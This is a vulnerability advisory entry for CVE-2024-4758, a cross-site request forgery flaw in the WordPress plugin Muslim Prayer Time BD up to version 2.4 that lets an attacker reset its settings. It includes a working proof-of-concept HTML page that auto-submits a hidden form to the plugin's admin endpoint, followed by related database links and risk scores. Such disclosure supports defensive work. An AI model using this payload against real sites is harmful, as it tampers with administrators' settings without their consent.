Lucene search
Bob MatyasWPEX-ID:64EC57A5-35D8-4C69-BDBA-096C2245A0DBHistoryJun 05, 2024 - 12:00 a.m.
Muslim Prayer Time BD <= 2.4 - Settings Reset via CSRF
2024-06-0500:00:00
Bob Matyas
8
muslim prayer time bd
csrf
settings reset
admin
html
exploit
Description The plugin does not have CSRF check in place when reseting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=muslim-prayer-time-bd%2Fadmin-settings.php" method="post">
<input type="hidden" name="option_page" value="mptb-settings-group" />
<input type="hidden" name="clear_all" value="1" />
<input type="submit" value="Submit" />
</form>
</body>
```Related
wpvulndb
wpvulndb
Muslim Prayer Time BD <= 2.4 - Settings Reset via CSRF
2024-06-05 00:00:00
nvd
nvd
CVE-2024-4758
2024-06-26 06:15:16
cve
cve
CVE-2024-4758
2024-06-26 06:15:16
cvelist
cvelist
CVE-2024-4758 Muslim Prayer Time BD <= 2.4 - Settings Reset via CSRF
2024-06-26 06:00:02
vulnrichment
vulnrichment
CVE-2024-4758 Muslim Prayer Time BD <= 2.4 - Settings Reset via CSRF
2024-06-26 06:00:02
6.7 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:64EC57A5-35D8-4C69-BDBA-096C2245A0DB